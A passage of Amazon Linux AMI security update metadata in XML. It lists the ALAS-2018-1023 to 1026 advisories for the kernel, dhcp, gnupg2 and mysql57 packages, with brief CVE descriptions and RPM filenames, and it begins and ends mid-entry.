arch="x86_64"><filename>Packages/php70-gd-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.30-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1023</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1023: important priority package update for kernel</title><issued date="2018-05-25 18:12:00" /><updated date="2019-01-25 03:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8897:
A flaw was found in the way the Linux kernel handled exceptions delivered after a stack switch operation via Mov SS or Pop SS instructions. During the stack switch operation, the processor did not deliver interrupts and exceptions, rather they are delivered once the first instruction after the stack switch is executed. An unprivileged system user could use this flaw to crash the system kernel resulting in the denial of service.
1567074:
CVE-2018-8897 Kernel: error in exception handling leads to DoS
CVE-2018-7995:
A race condition in the store_int_with_restart() function in arch/x86/kernel/cpu/mcheck/mce.c in the Linux kernel allows local users to cause a denial of service (panic) by leveraging root access to write to the check_interval file in a /sys/devices/system/machinecheck/machinecheck&lt;cpu number&gt; directory.
1553911:
CVE-2018-7995 kernel: Race condition in the store_int_with_restart() function in cpu/mcheck/mce.c
CVE-2018-1108:
A weakness was found in the Linux kernel&#039;s implementation of random seed data. Programs, early in the boot sequence, could use the data allocated for the seed before it was sufficiently generated.
1567306:
CVE-2018-1108 kernel: drivers: getrandom(2) unblocks too early after system boot
CVE-2018-1091:
A flaw was found in the Linux kernel where a crash can be triggered from unprivileged userspace during core dump on a POWER system with a certain configuration. This is due to a missing processor feature check and an erroneous use of transactional memory (TM) instructions in the core dump path leading to a denial of service.
1558149:
CVE-2018-1091 kernel: guest kernel crash during core dump on POWER9 host
CVE-2018-10901:
A flaw was found in Linux kernel&#039;s KVM virtualization subsystem. The VMX code does not restore the GDT.LIMIT to the previous host value, but instead sets it to 64KB. With a corrupted GDT limit a host&#039;s userspace code has an ability to place malicious entries in the GDT, particularly to the per-cpu variables. An attacker can use this to escalate their privileges.
1601849:
CVE-2018-10901 kernel: kvm: vmx: host GDT limit corruption
CVE-2018-1087:
A flaw was found in the way the Linux kernel&#039;s KVM hypervisor handled exceptions delivered after a stack switch operation via Mov SS or Pop SS instructions. During the stack switch operation, the processor did not deliver interrupts and exceptions, rather they are delivered once the first instruction after the stack switch is executed. An unprivileged KVM guest user could use this flaw to crash the guest or, potentially, escalate their privileges in the guest.
1566837:
CVE-2018-1087 Kernel: KVM: error in exception handling leads to wrong debug stack value
CVE-2018-1068:
A flaw was found in the Linux kernel&#039;s implementation of 32-bit syscall interface for bridging. This allowed a privileged user to arbitrarily write to a limited range of kernel memory.
1552048:
CVE-2018-1068 kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c
CVE-2018-10675:
The do_get_mempolicy() function in mm/mempolicy.c in the Linux kernel allows local users to hit a use-after-free bug via crafted system calls and thus cause a denial of service (DoS) or possibly have unspecified other impact. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.
1575065:
CVE-2018-10675 kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact
CVE-2018-1000199:
An address corruption flaw was discovered in the Linux kernel built with hardware breakpoint (CONFIG_HAVE_HW_BREAKPOINT) support. While modifying a h/w breakpoint via &#039;modify_user_hw_breakpoint&#039; routine, an unprivileged user/process could use this flaw to crash the system kernel resulting in DoS OR to potentially escalate privileges on a the system.
1568477:
CVE-2018-1000199 kernel: ptrace() incorrect error handling leads to corruption and DoS
CVE-2017-16939:
The Linux kernel is vulerable to a use-after-free flaw when Transformation User configuration interface(CONFIG_XFRM_USER) compile-time configuration were enabled. This vulnerability occurs while closing a xfrm netlink socket in xfrm_dump_policy_done. A user/process could abuse this flaw to potentially escalate their privileges on a system.
1517220:
CVE-2017-16939 Kernel: ipsec: xfrm: use-after-free leading to potential privilege escalation
CVE-2017-13215:
A flaw was found in the Linux kernel&#039;s skcipher component, which affects the skcipher_recvmsg function. Attackers using a specific input can lead to a privilege escalation.
1535173:
CVE-2017-13215 kernel: crypto: privilege escalation in skcipher_recvmsg function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13215" title="" id="CVE-2017-13215" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16939" title="" id="CVE-2017-16939" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000199" title="" id="CVE-2018-1000199" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10675" title="" id="CVE-2018-10675" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1068" title="" id="CVE-2018-1068" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1087" title="" id="CVE-2018-1087" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10901" title="" id="CVE-2018-10901" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1091" title="" id="CVE-2018-1091" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1108" title="" id="CVE-2018-1108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7995" title="" id="CVE-2018-7995" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897" title="" id="CVE-2018-8897" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.42-52.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1024</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1024: low priority package update for dhcp</title><issued date="2018-05-25 18:16:00" /><updated date="2018-05-29 23:01:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1111:
A command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in Amazon Linux 2. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.
1567974:
CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111" title="" id="CVE-2018-1111" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.28.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-53.P1.28.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-53.P1.28.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-53.P1.28.amzn1.x86_64.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-53.P1.28.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-53.P1.28.amzn1.i686.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.28.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-53.P1.28.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-53.P1.28.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-53.P1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1025</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1025: low priority package update for gnupg2</title><issued date="2018-05-25 18:21:00" /><updated date="2018-07-24 21:04:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-9234:
GnuPG 2.2.4 and 2.2.5 does not enforce a configuration in which key certification requires an offline master Certify key, which results in apparently valid certifications that occurred only with access to a signing subkey.
1563930:
CVE-2018-9234 GnuPG: Unenforced configuration allows for apparently valid certifications actually signed by signing subkeys
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9234" title="" id="CVE-2018-9234" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg2-smime" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="2.32.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.28-2.32.amzn1.i686.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.32.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.28-2.32.amzn1.i686.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.32.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-2.0.28-2.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1026</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1026: medium priority package update for mysql57</title><issued date="2018-05-25 18:22:00" /><updated date="2018-05-29 23:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2846:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Performance Schema). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568958:
CVE-2018-2846 mysql: Server: Performance Schema unspecified vulnerability (CPU Apr 2018)
CVE-2018-2839:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568957:
CVE-2018-2839 mysql: Server: DML unspecified vulnerability (CPU Apr 2018)
CVE-2018-2819:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568956:
CVE-2018-2819 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2818:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568955:
CVE-2018-2818 mysql: Server : Security : Privileges unspecified vulnerability (CPU Apr 2018)
CVE-2018-2817:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568954:
CVE-2018-2817 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2816:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568953:
CVE-2018-2816 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2813:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
1568951:
CVE-2018-2813 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2812:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1568950:
CVE-2018-2812 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2810:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568949:
CVE-2018-2810 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2787:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1568946:
CVE-2018-2787 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2786:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1568945:
CVE-2018-2786 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2784:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568944:
CVE-2018-2784 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2782:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568943:
CVE-2018-2782 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2781:
